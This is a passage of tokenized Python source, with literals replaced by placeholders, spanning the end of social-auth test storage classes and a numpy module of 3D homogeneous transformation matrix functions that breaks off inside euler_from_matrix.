get ( cls , server_url = None , handle = None ) : <EOL> result = [ ] <EOL> for assoc in TestAssociation . cache . values ( ) : <EOL> if server_url and assoc . server_url != server_url : <EOL> continue <EOL> if handle and assoc . handle != handle : <EOL> continue <EOL> result . append ( assoc ) <EOL> return result <EOL> @ classmethod <EOL> def remove ( cls , ids_to_delete ) : <EOL> assoc = filter ( lambda a : a . id in ids_to_delete , <EOL> TestAssociation . cache . values ( ) ) <EOL> for a in list ( assoc ) : <EOL> TestAssociation . cache . pop ( ( a . server_url , a . handle ) , None ) <EOL> class TestCode ( CodeMixin , BaseModel ) : <EOL> NEXT_ID = <NUM_LIT:1> <EOL> cache = { } <EOL> @ classmethod <EOL> def get_code ( cls , code ) : <EOL> for c in cls . cache . values ( ) : <EOL> if c . code == code : <EOL> return c <EOL> class TestStorage ( BaseStorage ) : <EOL> user = TestUserSocialAuth <EOL> nonce = TestNonce <EOL> association = TestAssociation <EOL> code = TestCode </s>
<s> """<STR_LIT>""" </s>
<s> """<STR_LIT>""" <EOL> from __future__ import division <EOL> import warnings <EOL> import math <EOL> import numpy <EOL> __docformat__ = "<STR_LIT>" <EOL> def identity_matrix ( ) : <EOL> """<STR_LIT>""" <EOL> return numpy . identity ( <NUM_LIT:4> , dtype = numpy . float64 ) <EOL> def translation_matrix ( direction ) : <EOL> """<STR_LIT>""" <EOL> M = numpy . identity ( <NUM_LIT:4> ) <EOL> M [ : <NUM_LIT:3> , <NUM_LIT:3> ] = direction [ : <NUM_LIT:3> ] <EOL> return M <EOL> def translation_from_matrix ( matrix ) : <EOL> """<STR_LIT>""" <EOL> return numpy . array ( matrix , copy = False ) [ : <NUM_LIT:3> , <NUM_LIT:3> ] . copy ( ) <EOL> def reflection_matrix ( point , normal ) : <EOL> """<STR_LIT>""" <EOL> normal = unit_vector ( normal [ : <NUM_LIT:3> ] ) <EOL> M = numpy . identity ( <NUM_LIT:4> ) <EOL> M [ : <NUM_LIT:3> , : <NUM_LIT:3> ] -= <NUM_LIT> * numpy . outer ( normal , normal ) <EOL> M [ : <NUM_LIT:3> , <NUM_LIT:3> ] = ( <NUM_LIT> * numpy . dot ( point [ : <NUM_LIT:3> ] , normal ) ) * normal <EOL> return M <EOL> def reflection_from_matrix ( matrix ) : <EOL> """<STR_LIT>""" <EOL> M = numpy . array ( matrix , dtype = numpy . float64 , copy = False ) <EOL> l , V = numpy . linalg . eig ( M [ : <NUM_LIT:3> , : <NUM_LIT:3> ] ) <EOL> i = numpy . where ( abs ( numpy . real ( l ) + <NUM_LIT:1.0> ) < <NUM_LIT> ) [ <NUM_LIT:0> ] <EOL> if not len ( i ) : <EOL> raise ValueError ( "<STR_LIT>" ) <EOL> normal = numpy . real ( V [ : , i [ <NUM_LIT:0> ] ] ) . squeeze ( ) <EOL> l , V = numpy . linalg . eig ( M ) <EOL> i = numpy . where ( abs ( numpy . real ( l ) - <NUM_LIT:1.0> ) < <NUM_LIT> ) [ <NUM_LIT:0> ] <EOL> if not len ( i ) : <EOL> raise ValueError ( "<STR_LIT>" ) <EOL> point = numpy . real ( V [ : , i [ - <NUM_LIT:1> ] ] ) . squeeze ( ) <EOL> point /= point [ <NUM_LIT:3> ] <EOL> return point , normal <EOL> def rotation_matrix ( angle , direction , point = None ) : <EOL> """<STR_LIT>""" <EOL> sina = math . sin ( angle ) <EOL> cosa = math . cos ( angle ) <EOL> direction = unit_vector ( direction [ : <NUM_LIT:3> ] ) <EOL> R = numpy . array ( ( ( cosa , <NUM_LIT:0.0> , <NUM_LIT:0.0> ) , <EOL> ( <NUM_LIT:0.0> , cosa , <NUM_LIT:0.0> ) , <EOL> ( <NUM_LIT:0.0> , <NUM_LIT:0.0> , cosa ) ) , dtype = numpy . float64 ) <EOL> R += numpy . outer ( direction , direction ) * ( <NUM_LIT:1.0> - cosa ) <EOL> direction *= sina <EOL> R += numpy . array ( ( ( <NUM_LIT:0.0> , - direction [ <NUM_LIT:2> ] , direction [ <NUM_LIT:1> ] ) , <EOL> ( direction [ <NUM_LIT:2> ] , <NUM_LIT:0.0> , - direction [ <NUM_LIT:0> ] ) , <EOL> ( - direction [ <NUM_LIT:1> ] , direction [ <NUM_LIT:0> ] , <NUM_LIT:0.0> ) ) , <EOL> dtype = numpy . float64 ) <EOL> M = numpy . identity ( <NUM_LIT:4> ) <EOL> M [ : <NUM_LIT:3> , : <NUM_LIT:3> ] = R <EOL> if point is not None : <EOL> point = numpy . array ( point [ : <NUM_LIT:3> ] , dtype = numpy . float64 , copy = False ) <EOL> M [ : <NUM_LIT:3> , <NUM_LIT:3> ] = point - numpy . dot ( R , point ) <EOL> return M <EOL> def rotation_from_matrix ( matrix ) : <EOL> """<STR_LIT>""" <EOL> R = numpy . array ( matrix , dtype = numpy . float64 , copy = False ) <EOL> R33 = R [ : <NUM_LIT:3> , : <NUM_LIT:3> ] <EOL> l , W = numpy . linalg . eig ( R33 . T ) <EOL> i = numpy . where ( abs ( numpy . real ( l ) - <NUM_LIT:1.0> ) < <NUM_LIT> ) [ <NUM_LIT:0> ] <EOL> if not len ( i ) : <EOL> raise ValueError ( "<STR_LIT>" ) <EOL> direction = numpy . real ( W [ : , i [ - <NUM_LIT:1> ] ] ) . squeeze ( ) <EOL> l , Q = numpy . linalg . eig ( R ) <EOL> i = numpy . where ( abs ( numpy . real ( l ) - <NUM_LIT:1.0> ) < <NUM_LIT> ) [ <NUM_LIT:0> ] <EOL> if not len ( i ) : <EOL> raise ValueError ( "<STR_LIT>" ) <EOL> point = numpy . real ( Q [ : , i [ - <NUM_LIT:1> ] ] ) . squeeze ( ) <EOL> point /= point [ <NUM_LIT:3> ] <EOL> cosa = ( numpy . trace ( R33 ) - <NUM_LIT:1.0> ) / <NUM_LIT> <EOL> if abs ( direction [ <NUM_LIT:2> ] ) > <NUM_LIT> : <EOL> sina = ( R [ <NUM_LIT:1> , <NUM_LIT:0> ] + ( cosa - <NUM_LIT:1.0> ) * direction [ <NUM_LIT:0> ] * direction [ <NUM_LIT:1> ] ) / direction [ <NUM_LIT:2> ] <EOL> elif abs ( direction [ <NUM_LIT:1> ] ) > <NUM_LIT> : <EOL> sina = ( R [ <NUM_LIT:0> , <NUM_LIT:2> ] + ( cosa - <NUM_LIT:1.0> ) * direction [ <NUM_LIT:0> ] * direction [ <NUM_LIT:2> ] ) / direction [ <NUM_LIT:1> ] <EOL> else : <EOL> sina = ( R [ <NUM_LIT:2> , <NUM_LIT:1> ] + ( cosa - <NUM_LIT:1.0> ) * direction [ <NUM_LIT:1> ] * direction [ <NUM_LIT:2> ] ) / direction [ <NUM_LIT:0> ] <EOL> angle = math . atan2 ( sina , cosa ) <EOL> return angle , direction , point <EOL> def scale_matrix ( factor , origin = None , direction = None ) : <EOL> """<STR_LIT>""" <EOL> if direction is None : <EOL> M = numpy . array ( ( ( factor , <NUM_LIT:0.0> , <NUM_LIT:0.0> , <NUM_LIT:0.0> ) , <EOL> ( <NUM_LIT:0.0> , factor , <NUM_LIT:0.0> , <NUM_LIT:0.0> ) , <EOL> ( <NUM_LIT:0.0> , <NUM_LIT:0.0> , factor , <NUM_LIT:0.0> ) , <EOL> ( <NUM_LIT:0.0> , <NUM_LIT:0.0> , <NUM_LIT:0.0> , <NUM_LIT:1.0> ) ) , dtype = numpy . float64 ) <EOL> if origin is not None : <EOL> M [ : <NUM_LIT:3> , <NUM_LIT:3> ] = origin [ : <NUM_LIT:3> ] <EOL> M [ : <NUM_LIT:3> , <NUM_LIT:3> ] *= <NUM_LIT:1.0> - factor <EOL> else : <EOL> direction = unit_vector ( direction [ : <NUM_LIT:3> ] ) <EOL> factor = <NUM_LIT:1.0> - factor <EOL> M = numpy . identity ( <NUM_LIT:4> ) <EOL> M [ : <NUM_LIT:3> , : <NUM_LIT:3> ] -= factor * numpy . outer ( direction , direction ) <EOL> if origin is not None : <EOL> M [ : <NUM_LIT:3> , <NUM_LIT:3> ] = ( factor * numpy . dot ( origin [ : <NUM_LIT:3> ] , direction ) ) * direction <EOL> return M <EOL> def scale_from_matrix ( matrix ) : <EOL> """<STR_LIT>""" <EOL> M = numpy . array ( matrix , dtype = numpy . float64 , copy = False ) <EOL> M33 = M [ : <NUM_LIT:3> , : <NUM_LIT:3> ] <EOL> factor = numpy . trace ( M33 ) - <NUM_LIT> <EOL> try : <EOL> l , V = numpy . linalg . eig ( M33 ) <EOL> i = numpy . where ( abs ( numpy . real ( l ) - factor ) < <NUM_LIT> ) [ <NUM_LIT:0> ] [ <NUM_LIT:0> ] <EOL> direction = numpy . real ( V [ : , i ] ) . squeeze ( ) <EOL> direction /= vector_norm ( direction ) <EOL> except IndexError : <EOL> factor = ( factor + <NUM_LIT> ) / <NUM_LIT> <EOL> direction = None <EOL> l , V = numpy . linalg . eig ( M ) <EOL> i = numpy . where ( abs ( numpy . real ( l ) - <NUM_LIT:1.0> ) < <NUM_LIT> ) [ <NUM_LIT:0> ] <EOL> if not len ( i ) : <EOL> raise ValueError ( "<STR_LIT>" ) <EOL> origin = numpy . real ( V [ : , i [ - <NUM_LIT:1> ] ] ) . squeeze ( ) <EOL> origin /= origin [ <NUM_LIT:3> ] <EOL> return factor , origin , direction <EOL> def projection_matrix ( point , normal , direction = None , <EOL> perspective = None , pseudo = False ) : <EOL> """<STR_LIT>""" <EOL> M = numpy . identity ( <NUM_LIT:4> ) <EOL> point = numpy . array ( point [ : <NUM_LIT:3> ] , dtype = numpy . float64 , copy = False ) <EOL> normal = unit_vector ( normal [ : <NUM_LIT:3> ] ) <EOL> if perspective is not None : <EOL> perspective = numpy . array ( perspective [ : <NUM_LIT:3> ] , dtype = numpy . float64 , <EOL> copy = False ) <EOL> M [ <NUM_LIT:0> , <NUM_LIT:0> ] = M [ <NUM_LIT:1> , <NUM_LIT:1> ] = M [ <NUM_LIT:2> , <NUM_LIT:2> ] = numpy . dot ( perspective - point , normal ) <EOL> M [ : <NUM_LIT:3> , : <NUM_LIT:3> ] -= numpy . outer ( perspective , normal ) <EOL> if pseudo : <EOL> M [ : <NUM_LIT:3> , : <NUM_LIT:3> ] -= numpy . outer ( normal , normal ) <EOL> M [ : <NUM_LIT:3> , <NUM_LIT:3> ] = numpy . dot ( point , normal ) * ( perspective + normal ) <EOL> else : <EOL> M [ : <NUM_LIT:3> , <NUM_LIT:3> ] = numpy . dot ( point , normal ) * perspective <EOL> M [ <NUM_LIT:3> , : <NUM_LIT:3> ] = - normal <EOL> M [ <NUM_LIT:3> , <NUM_LIT:3> ] = numpy . dot ( perspective , normal ) <EOL> elif direction is not None : <EOL> direction = numpy . array ( direction [ : <NUM_LIT:3> ] , dtype = numpy . float64 , copy = False ) <EOL> scale = numpy . dot ( direction , normal ) <EOL> M [ : <NUM_LIT:3> , : <NUM_LIT:3> ] -= numpy . outer ( direction , normal ) / scale <EOL> M [ : <NUM_LIT:3> , <NUM_LIT:3> ] = direction * ( numpy . dot ( point , normal ) / scale ) <EOL> else : <EOL> M [ : <NUM_LIT:3> , : <NUM_LIT:3> ] -= numpy . outer ( normal , normal ) <EOL> M [ : <NUM_LIT:3> , <NUM_LIT:3> ] = numpy . dot ( point , normal ) * normal <EOL> return M <EOL> def projection_from_matrix ( matrix , pseudo = False ) : <EOL> """<STR_LIT>""" <EOL> M = numpy . array ( matrix , dtype = numpy . float64 , copy = False ) <EOL> M33 = M [ : <NUM_LIT:3> , : <NUM_LIT:3> ] <EOL> l , V = numpy . linalg . eig ( M ) <EOL> i = numpy . where ( abs ( numpy . real ( l ) - <NUM_LIT:1.0> ) < <NUM_LIT> ) [ <NUM_LIT:0> ] <EOL> if not pseudo and len ( i ) : <EOL> point = numpy . real ( V [ : , i [ - <NUM_LIT:1> ] ] ) . squeeze ( ) <EOL> point /= point [ <NUM_LIT:3> ] <EOL> l , V = numpy . linalg . eig ( M33 ) <EOL> i = numpy . where ( abs ( numpy . real ( l ) ) < <NUM_LIT> ) [ <NUM_LIT:0> ] <EOL> if not len ( i ) : <EOL> raise ValueError ( "<STR_LIT>" ) <EOL> direction = numpy . real ( V [ : , i [ <NUM_LIT:0> ] ] ) . squeeze ( ) <EOL> direction /= vector_norm ( direction ) <EOL> l , V = numpy . linalg . eig ( M33 . T ) <EOL> i = numpy . where ( abs ( numpy . real ( l ) ) < <NUM_LIT> ) [ <NUM_LIT:0> ] <EOL> if len ( i ) : <EOL> normal = numpy . real ( V [ : , i [ <NUM_LIT:0> ] ] ) . squeeze ( ) <EOL> normal /= vector_norm ( normal ) <EOL> return point , normal , direction , None , False <EOL> else : <EOL> return point , direction , None , None , False <EOL> else : <EOL> i = numpy . where ( abs ( numpy . real ( l ) ) > <NUM_LIT> ) [ <NUM_LIT:0> ] <EOL> if not len ( i ) : <EOL> raise ValueError ( <EOL> "<STR_LIT>" ) <EOL> point = numpy . real ( V [ : , i [ - <NUM_LIT:1> ] ] ) . squeeze ( ) <EOL> point /= point [ <NUM_LIT:3> ] <EOL> normal = - M [ <NUM_LIT:3> , : <NUM_LIT:3> ] <EOL> perspective = M [ : <NUM_LIT:3> , <NUM_LIT:3> ] / numpy . dot ( point [ : <NUM_LIT:3> ] , normal ) <EOL> if pseudo : <EOL> perspective -= normal <EOL> return point , normal , None , perspective , pseudo <EOL> def clip_matrix ( left , right , bottom , top , near , far , perspective = False ) : <EOL> """<STR_LIT>""" <EOL> if left >= right or bottom >= top or near >= far : <EOL> raise ValueError ( "<STR_LIT>" ) <EOL> if perspective : <EOL> if near <= _EPS : <EOL> raise ValueError ( "<STR_LIT>" ) <EOL> t = <NUM_LIT> * near <EOL> M = ( ( - t / ( right - left ) , <NUM_LIT:0.0> , ( right + left ) / ( right - left ) , <NUM_LIT:0.0> ) , <EOL> ( <NUM_LIT:0.0> , - t / ( top - bottom ) , ( top + bottom ) / ( top - bottom ) , <NUM_LIT:0.0> ) , <EOL> ( <NUM_LIT:0.0> , <NUM_LIT:0.0> , - ( far + near ) / ( far - near ) , t * far / ( far - near ) ) , <EOL> ( <NUM_LIT:0.0> , <NUM_LIT:0.0> , - <NUM_LIT:1.0> , <NUM_LIT:0.0> ) ) <EOL> else : <EOL> M = ( ( <NUM_LIT> / ( right - left ) , <NUM_LIT:0.0> , <NUM_LIT:0.0> , ( right + left ) / ( left - right ) ) , <EOL> ( <NUM_LIT:0.0> , <NUM_LIT> / ( top - bottom ) , <NUM_LIT:0.0> , ( top + bottom ) / ( bottom - top ) ) , <EOL> ( <NUM_LIT:0.0> , <NUM_LIT:0.0> , <NUM_LIT> / ( far - near ) , ( far + near ) / ( near - far ) ) , <EOL> ( <NUM_LIT:0.0> , <NUM_LIT:0.0> , <NUM_LIT:0.0> , <NUM_LIT:1.0> ) ) <EOL> return numpy . array ( M , dtype = numpy . float64 ) <EOL> def shear_matrix ( angle , direction , point , normal ) : <EOL> """<STR_LIT>""" <EOL> normal = unit_vector ( normal [ : <NUM_LIT:3> ] ) <EOL> direction = unit_vector ( direction [ : <NUM_LIT:3> ] ) <EOL> if abs ( numpy . dot ( normal , direction ) ) > <NUM_LIT> : <EOL> raise ValueError ( "<STR_LIT>" ) <EOL> angle = math . tan ( angle ) <EOL> M = numpy . identity ( <NUM_LIT:4> ) <EOL> M [ : <NUM_LIT:3> , : <NUM_LIT:3> ] += angle * numpy . outer ( direction , normal ) <EOL> M [ : <NUM_LIT:3> , <NUM_LIT:3> ] = - angle * numpy . dot ( point [ : <NUM_LIT:3> ] , normal ) * direction <EOL> return M <EOL> def shear_from_matrix ( matrix ) : <EOL> """<STR_LIT>""" <EOL> M = numpy . array ( matrix , dtype = numpy . float64 , copy = False ) <EOL> M33 = M [ : <NUM_LIT:3> , : <NUM_LIT:3> ] <EOL> l , V = numpy . linalg . eig ( M33 ) <EOL> i = numpy . where ( abs ( numpy . real ( l ) - <NUM_LIT:1.0> ) < <NUM_LIT> ) [ <NUM_LIT:0> ] <EOL> if len ( i ) < <NUM_LIT:2> : <EOL> raise ValueError ( "<STR_LIT>" % l ) <EOL> V = numpy . real ( V [ : , i ] ) . squeeze ( ) . T <EOL> lenorm = - <NUM_LIT:1.0> <EOL> for i0 , i1 in ( ( <NUM_LIT:0> , <NUM_LIT:1> ) , ( <NUM_LIT:0> , <NUM_LIT:2> ) , ( <NUM_LIT:1> , <NUM_LIT:2> ) ) : <EOL> n = numpy . cross ( V [ i0 ] , V [ i1 ] ) <EOL> l = vector_norm ( n ) <EOL> if l > lenorm : <EOL> lenorm = l <EOL> normal = n <EOL> normal /= lenorm <EOL> direction = numpy . dot ( M33 - numpy . identity ( <NUM_LIT:3> ) , normal ) <EOL> angle = vector_norm ( direction ) <EOL> direction /= angle <EOL> angle = math . atan ( angle ) <EOL> l , V = numpy . linalg . eig ( M ) <EOL> i = numpy . where ( abs ( numpy . real ( l ) - <NUM_LIT:1.0> ) < <NUM_LIT> ) [ <NUM_LIT:0> ] <EOL> if not len ( i ) : <EOL> raise ValueError ( "<STR_LIT>" ) <EOL> point = numpy . real ( V [ : , i [ - <NUM_LIT:1> ] ] ) . squeeze ( ) <EOL> point /= point [ <NUM_LIT:3> ] <EOL> return angle , direction , point , normal <EOL> def decompose_matrix ( matrix ) : <EOL> """<STR_LIT>""" <EOL> M = numpy . array ( matrix , dtype = numpy . float64 , copy = True ) . T <EOL> if abs ( M [ <NUM_LIT:3> , <NUM_LIT:3> ] ) < _EPS : <EOL> raise ValueError ( "<STR_LIT>" ) <EOL> M /= M [ <NUM_LIT:3> , <NUM_LIT:3> ] <EOL> P = M . copy ( ) <EOL> P [ : , <NUM_LIT:3> ] = <NUM_LIT:0> , <NUM_LIT:0> , <NUM_LIT:0> , <NUM_LIT:1> <EOL> if not numpy . linalg . det ( P ) : <EOL> raise ValueError ( "<STR_LIT>" ) <EOL> scale = numpy . zeros ( ( <NUM_LIT:3> , ) , dtype = numpy . float64 ) <EOL> shear = [ <NUM_LIT:0> , <NUM_LIT:0> , <NUM_LIT:0> ] <EOL> angles = [ <NUM_LIT:0> , <NUM_LIT:0> , <NUM_LIT:0> ] <EOL> if any ( abs ( M [ : <NUM_LIT:3> , <NUM_LIT:3> ] ) > _EPS ) : <EOL> perspective = numpy . dot ( M [ : , <NUM_LIT:3> ] , numpy . linalg . inv ( P . T ) ) <EOL> M [ : , <NUM_LIT:3> ] = <NUM_LIT:0> , <NUM_LIT:0> , <NUM_LIT:0> , <NUM_LIT:1> <EOL> else : <EOL> perspective = numpy . array ( ( <NUM_LIT:0> , <NUM_LIT:0> , <NUM_LIT:0> , <NUM_LIT:1> ) , dtype = numpy . float64 ) <EOL> translate = M [ <NUM_LIT:3> , : <NUM_LIT:3> ] . copy ( ) <EOL> M [ <NUM_LIT:3> , : <NUM_LIT:3> ] = <NUM_LIT:0> <EOL> row = M [ : <NUM_LIT:3> , : <NUM_LIT:3> ] . copy ( ) <EOL> scale [ <NUM_LIT:0> ] = vector_norm ( row [ <NUM_LIT:0> ] ) <EOL> row [ <NUM_LIT:0> ] /= scale [ <NUM_LIT:0> ] <EOL> shear [ <NUM_LIT:0> ] = numpy . dot ( row [ <NUM_LIT:0> ] , row [ <NUM_LIT:1> ] ) <EOL> row [ <NUM_LIT:1> ] -= row [ <NUM_LIT:0> ] * shear [ <NUM_LIT:0> ] <EOL> scale [ <NUM_LIT:1> ] = vector_norm ( row [ <NUM_LIT:1> ] ) <EOL> row [ <NUM_LIT:1> ] /= scale [ <NUM_LIT:1> ] <EOL> shear [ <NUM_LIT:0> ] /= scale [ <NUM_LIT:1> ] <EOL> shear [ <NUM_LIT:1> ] = numpy . dot ( row [ <NUM_LIT:0> ] , row [ <NUM_LIT:2> ] ) <EOL> row [ <NUM_LIT:2> ] -= row [ <NUM_LIT:0> ] * shear [ <NUM_LIT:1> ] <EOL> shear [ <NUM_LIT:2> ] = numpy . dot ( row [ <NUM_LIT:1> ] , row [ <NUM_LIT:2> ] ) <EOL> row [ <NUM_LIT:2> ] -= row [ <NUM_LIT:1> ] * shear [ <NUM_LIT:2> ] <EOL> scale [ <NUM_LIT:2> ] = vector_norm ( row [ <NUM_LIT:2> ] ) <EOL> row [ <NUM_LIT:2> ] /= scale [ <NUM_LIT:2> ] <EOL> shear [ <NUM_LIT:1> : ] /= scale [ <NUM_LIT:2> ] <EOL> if numpy . dot ( row [ <NUM_LIT:0> ] , numpy . cross ( row [ <NUM_LIT:1> ] , row [ <NUM_LIT:2> ] ) ) < <NUM_LIT:0> : <EOL> scale *= - <NUM_LIT:1> <EOL> row *= - <NUM_LIT:1> <EOL> angles [ <NUM_LIT:1> ] = math . asin ( - row [ <NUM_LIT:0> , <NUM_LIT:2> ] ) <EOL> if math . cos ( angles [ <NUM_LIT:1> ] ) : <EOL> angles [ <NUM_LIT:0> ] = math . atan2 ( row [ <NUM_LIT:1> , <NUM_LIT:2> ] , row [ <NUM_LIT:2> , <NUM_LIT:2> ] ) <EOL> angles [ <NUM_LIT:2> ] = math . atan2 ( row [ <NUM_LIT:0> , <NUM_LIT:1> ] , row [ <NUM_LIT:0> , <NUM_LIT:0> ] ) <EOL> else : <EOL> angles [ <NUM_LIT:0> ] = math . atan2 ( - row [ <NUM_LIT:2> , <NUM_LIT:1> ] , row [ <NUM_LIT:1> , <NUM_LIT:1> ] ) <EOL> angles [ <NUM_LIT:2> ] = <NUM_LIT:0.0> <EOL> return scale , shear , angles , translate , perspective <EOL> def compose_matrix ( scale = None , shear = None , angles = None , translate = None , <EOL> perspective = None ) : <EOL> """<STR_LIT>""" <EOL> M = numpy . identity ( <NUM_LIT:4> ) <EOL> if perspective is not None : <EOL> P = numpy . identity ( <NUM_LIT:4> ) <EOL> P [ <NUM_LIT:3> , : ] = perspective [ : <NUM_LIT:4> ] <EOL> M = numpy . dot ( M , P ) <EOL> if translate is not None : <EOL> T = numpy . identity ( <NUM_LIT:4> ) <EOL> T [ : <NUM_LIT:3> , <NUM_LIT:3> ] = translate [ : <NUM_LIT:3> ] <EOL> M = numpy . dot ( M , T ) <EOL> if angles is not None : <EOL> R = euler_matrix ( angles [ <NUM_LIT:0> ] , angles [ <NUM_LIT:1> ] , angles [ <NUM_LIT:2> ] , '<STR_LIT>' ) <EOL> M = numpy . dot ( M , R ) <EOL> if shear is not None : <EOL> Z = numpy . identity ( <NUM_LIT:4> ) <EOL> Z [ <NUM_LIT:1> , <NUM_LIT:2> ] = shear [ <NUM_LIT:2> ] <EOL> Z [ <NUM_LIT:0> , <NUM_LIT:2> ] = shear [ <NUM_LIT:1> ] <EOL> Z [ <NUM_LIT:0> , <NUM_LIT:1> ] = shear [ <NUM_LIT:0> ] <EOL> M = numpy . dot ( M , Z ) <EOL> if scale is not None : <EOL> S = numpy . identity ( <NUM_LIT:4> ) <EOL> S [ <NUM_LIT:0> , <NUM_LIT:0> ] = scale [ <NUM_LIT:0> ] <EOL> S [ <NUM_LIT:1> , <NUM_LIT:1> ] = scale [ <NUM_LIT:1> ] <EOL> S [ <NUM_LIT:2> , <NUM_LIT:2> ] = scale [ <NUM_LIT:2> ] <EOL> M = numpy . dot ( M , S ) <EOL> M /= M [ <NUM_LIT:3> , <NUM_LIT:3> ] <EOL> return M <EOL> def orthogonalization_matrix ( lengths , angles ) : <EOL> """<STR_LIT>""" <EOL> a , b , c = lengths <EOL> angles = numpy . radians ( angles ) <EOL> sina , sinb , _ = numpy . sin ( angles ) <EOL> cosa , cosb , cosg = numpy . cos ( angles ) <EOL> co = ( cosa * cosb - cosg ) / ( sina * sinb ) <EOL> return numpy . array ( ( <EOL> ( a * sinb * math . sqrt ( <NUM_LIT:1.0> - co * co ) , <NUM_LIT:0.0> , <NUM_LIT:0.0> , <NUM_LIT:0.0> ) , <EOL> ( - a * sinb * co , b * sina , <NUM_LIT:0.0> , <NUM_LIT:0.0> ) , <EOL> ( a * cosb , b * cosa , c , <NUM_LIT:0.0> ) , <EOL> ( <NUM_LIT:0.0> , <NUM_LIT:0.0> , <NUM_LIT:0.0> , <NUM_LIT:1.0> ) ) , <EOL> dtype = numpy . float64 ) <EOL> def superimposition_matrix ( v0 , v1 , scaling = False , usesvd = True ) : <EOL> """<STR_LIT>""" <EOL> v0 = numpy . array ( v0 , dtype = numpy . float64 , copy = False ) [ : <NUM_LIT:3> ] <EOL> v1 = numpy . array ( v1 , dtype = numpy . float64 , copy = False ) [ : <NUM_LIT:3> ] <EOL> if v0 . shape != v1 . shape or v0 . shape [ <NUM_LIT:1> ] < <NUM_LIT:3> : <EOL> raise ValueError ( "<STR_LIT>" ) <EOL> t0 = numpy . mean ( v0 , axis = <NUM_LIT:1> ) <EOL> t1 = numpy . mean ( v1 , axis = <NUM_LIT:1> ) <EOL> v0 = v0 - t0 . reshape ( <NUM_LIT:3> , <NUM_LIT:1> ) <EOL> v1 = v1 - t1 . reshape ( <NUM_LIT:3> , <NUM_LIT:1> ) <EOL> if usesvd : <EOL> u , s , vh = numpy . linalg . svd ( numpy . dot ( v1 , v0 . T ) ) <EOL> R = numpy . dot ( u , vh ) <EOL> if numpy . linalg . det ( R ) < <NUM_LIT:0.0> : <EOL> R -= numpy . outer ( u [ : , <NUM_LIT:2> ] , vh [ <NUM_LIT:2> , : ] * <NUM_LIT> ) <EOL> s [ - <NUM_LIT:1> ] *= - <NUM_LIT:1.0> <EOL> M = numpy . identity ( <NUM_LIT:4> ) <EOL> M [ : <NUM_LIT:3> , : <NUM_LIT:3> ] = R <EOL> else : <EOL> xx , yy , zz = numpy . sum ( v0 * v1 , axis = <NUM_LIT:1> ) <EOL> xy , yz , zx = numpy . sum ( v0 * numpy . roll ( v1 , - <NUM_LIT:1> , axis = <NUM_LIT:0> ) , axis = <NUM_LIT:1> ) <EOL> xz , yx , zy = numpy . sum ( v0 * numpy . roll ( v1 , - <NUM_LIT:2> , axis = <NUM_LIT:0> ) , axis = <NUM_LIT:1> ) <EOL> N = ( ( xx + yy + zz , yz - zy , zx - xz , xy - yx ) , <EOL> ( yz - zy , xx - yy - zz , xy + yx , zx + xz ) , <EOL> ( zx - xz , xy + yx , - xx + yy - zz , yz + zy ) , <EOL> ( xy - yx , zx + xz , yz + zy , - xx - yy + zz ) ) <EOL> l , V = numpy . linalg . eig ( N ) <EOL> q = V [ : , numpy . argmax ( l ) ] <EOL> q /= vector_norm ( q ) <EOL> q = numpy . roll ( q , - <NUM_LIT:1> ) <EOL> M = quaternion_matrix ( q ) <EOL> if scaling : <EOL> v0 *= v0 <EOL> v1 *= v1 <EOL> M [ : <NUM_LIT:3> , : <NUM_LIT:3> ] *= math . sqrt ( numpy . sum ( v1 ) / numpy . sum ( v0 ) ) <EOL> M [ : <NUM_LIT:3> , <NUM_LIT:3> ] = t1 <EOL> T = numpy . identity ( <NUM_LIT:4> ) <EOL> T [ : <NUM_LIT:3> , <NUM_LIT:3> ] = - t0 <EOL> M = numpy . dot ( M , T ) <EOL> return M <EOL> def euler_matrix ( ai , aj , ak , axes = '<STR_LIT>' ) : <EOL> """<STR_LIT>""" <EOL> try : <EOL> firstaxis , parity , repetition , frame = _AXES2TUPLE [ axes ] <EOL> except ( AttributeError , KeyError ) : <EOL> _ = _TUPLE2AXES [ axes ] <EOL> firstaxis , parity , repetition , frame = axes <EOL> i = firstaxis <EOL> j = _NEXT_AXIS [ i + parity ] <EOL> k = _NEXT_AXIS [ i - parity + <NUM_LIT:1> ] <EOL> if frame : <EOL> ai , ak = ak , ai <EOL> if parity : <EOL> ai , aj , ak = - ai , - aj , - ak <EOL> si , sj , sk = math . sin ( ai ) , math . sin ( aj ) , math . sin ( ak ) <EOL> ci , cj , ck = math . cos ( ai ) , math . cos ( aj ) , math . cos ( ak ) <EOL> cc , cs = ci * ck , ci * sk <EOL> sc , ss = si * ck , si * sk <EOL> M = numpy . identity ( <NUM_LIT:4> ) <EOL> if repetition : <EOL> M [ i , i ] = cj <EOL> M [ i , j ] = sj * si <EOL> M [ i , k ] = sj * ci <EOL> M [ j , i ] = sj * sk <EOL> M [ j , j ] = - cj * ss + cc <EOL> M [ j , k ] = - cj * cs - sc <EOL> M [ k , i ] = - sj * ck <EOL> M [ k , j ] = cj * sc + cs <EOL> M [ k , k ] = cj * cc - ss <EOL> else : <EOL> M [ i , i ] = cj * ck <EOL> M [ i , j ] = sj * sc - cs <EOL> M [ i , k ] = sj * cc + ss <EOL> M [ j , i ] = cj * sk <EOL> M [ j , j ] = sj * ss + cc <EOL> M [ j , k ] = sj * cs - sc <EOL> M [ k , i ] = - sj <EOL> M [ k , j ] = cj * si <EOL> M [ k , k ] = cj * ci <EOL> return M <EOL> def euler_from_matrix ( matrix , axes = '<STR_LIT>' ) : <EOL> """<STR_LIT>""" <EOL> try : <EOL> firstaxis , parity , repetition , frame = _AXES2TUPLE [ axes . lower ( ) ] <EOL> except ( AttributeError , KeyError ) : <EOL> _ = _TUPLE2AXES [ axes ] <EOL> firstaxis , parity , repetition , frame = axes <EOL> i = firstaxis <EOL> j = _NEXT_AXIS [ i + parity ] <EOL> k = _NEXT_AXIS [ i - parity + <NUM_LIT:1> ] <EOL> M = numpy . array ( matrix , dtype = numpy . float64 , copy = False ) [ : <NUM_LIT:3> , : <NUM_LIT:3> ] <EOL> if repetition : <EOL> sy = math . sqrt ( M [ i , j ] * M [ i , j ] + M [ i , k ] * M [ i , k ] ) <EOL> if sy > _EPS : <EOL> ax = math . atan2 ( M [ i , j ] , M [ i , k ] ) <EOL> ay = math . atan2 ( sy , M [ i , i ] ) <EOL> az = math . atan2 ( M [ j , i ] , - M [ k , i ] ) <EOL> else : <EOL> ax = math . atan2 ( - M [ j , k ] , M [ j , j ] ) <EOL> ay = math . atan2 ( sy , M [ i , i ] ) <EOL> az = <NUM_LIT:0.0> <EOL> else : <EOL> cy = math . sqrt ( M [ i , i ] * M [ i , i ] + M [ j , i ] * M [ j , i ] ) <EOL> if cy > _EPS : 